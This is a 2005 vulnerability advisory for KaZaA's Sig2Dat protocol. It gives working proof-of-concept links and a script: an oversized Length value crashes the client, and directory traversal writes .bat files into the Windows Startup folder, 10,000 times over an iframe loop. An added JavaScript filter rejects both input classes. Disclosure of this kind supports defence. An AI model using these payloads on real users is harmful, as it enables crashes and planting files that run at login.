Kazaa Sig2Dat Protocol Multiple Remote Vulnerabilities
BID:12291
Info
| Bugtraq ID: | 12291 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2005 12:00AM |
| Updated: | Jan 17 2005 12:00AM |
| Credit: | "Rafel Ivgi, The-Insider" <[email protected]> is credited with discovery of this issue. |
| Vulnerable: | KaZaA Lite 2.0.2; KaZaA Lite 2.0; KaZaA Lite 1.7.2; KaZaA Media Desktop 3.0; KaZaA Media Desktop 2.6.4; KaZaA Media Desktop 2.0.2; KaZaA Media Desktop 2.0 |
| Not Vulnerable: | |
Discussion
Multiple remote vulnerabilities reportedly affect KaZaA's Sig2Dat protocol functionality. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in critical actions.
An attacker may leverage these issues to cause the affected application to crash, denying service to legitimate users, and to create files in arbitrary directories that are readable to the affected application.
Exploit / POC
No exploit is required to leverage these issues. The following proofs of concept have been provided:
To crash the affected application:
<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>
To create arbitrary files:
<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK_HERE</A>
<script>
var i
for (i=1;i<10000;i++)
{
mylocation="<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool"+i+".bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
document.write(mylocation);
}
</script>
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
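In the absence of a vendor patch, a link filter placed in front of the Sig2Dat handler can reject the two input classes shown in the proofs of concept: an out-of-range Length value and a File name containing directory traversal. The following is an added example, not code from this advisory or from KaZaA; `checkSig2Dat`, `MAX_LENGTH` (an assumed 32-bit ceiling) and the sample links are constructed for illustration.

```javascript
// Added example (not KaZaA or Sig2Dat code): vet a sig2dat:// link before handing it on.
// Field layout (File / Length / UUHash separated by '|') follows the links on this page.
// checkSig2Dat and MAX_LENGTH are hypothetical; the 32-bit ceiling is an assumption.
const MAX_LENGTH = 2n ** 32n - 1n;

function checkSig2Dat(uri) {
  const m = /^sig2dat:\/\/(.*)$/is.exec(uri);
  if (!m) return ["not a sig2dat URI"];
  let body;
  try {
    body = decodeURIComponent(m[1]);
  } catch (e) {
    return ["malformed percent-encoding"];
  }
  const problems = [];
  const fields = Object.create(null);
  for (const part of body.split("|")) {
    const idx = part.indexOf(":");
    if (idx <= 0) continue; // empty segments and the trailing "/"
    const key = part.slice(0, idx).trim().toLowerCase();
    if (key in fields) problems.push("duplicate " + key + " field");
    fields[key] = part.slice(idx + 1);
  }
  const file = fields.file;
  if (!file) {
    problems.push("missing File field");
  } else {
    // The name must be a bare file name: no directories, no parent references.
    if (/[\\/]/.test(file)) problems.push("File contains a path separator");
    if (/(^|[\\/])\.\.([\\/]|$)/.test(file)) problems.push("File contains a '..' segment");
    if (/[\x00-\x1f:%]/.test(file)) problems.push("File contains control chars, ':' or '%'");
  }
  // Parse the byte count as a BigInt so an oversized value cannot wrap or lose precision.
  const len = /^\s*(\d+)\s*Bytes\b/i.exec(fields.length || "");
  if (!len) problems.push("Length is not '<digits> Bytes'");
  else if (BigInt(len[1]) > MAX_LENGTH) problems.push("Length exceeds the 32-bit range");
  return problems;
}

// Constructed sample links (placeholder hash), percent-encoded like the ones on this page.
const HASH = "%7CUUHash:=AAAAAAAAAAAAAAAAAAAAAAAAAAA=%7C/";
const SAMPLES = {
  ok: "sig2dat://%7CFile:example.bin%7CLength:1024%20Bytes,1KB" + HASH,
  hugeLength: "sig2dat://%7CFile:example.bin%7CLength:99999999999999999999%20Bytes,1KB" + HASH,
  traversal: "sig2dat://%7CFile:../../example.bat%7CLength:1024%20Bytes,1KB" + HASH,
};
for (const [name, uri] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(checkSig2Dat(uri)));
}
```

An empty array means the link passed every check; any entry is a reason to drop the link instead of passing it to the handler.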
References
References:
- KaZaA Homepage (KaZaA)
- sig2dat Homepage (vlaibb)
- Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating ("Rafel Ivgi, The-Insider")
- Re: Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by crea ("Berend-Jan Wever")
- Re: Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by crea (Markus Kern)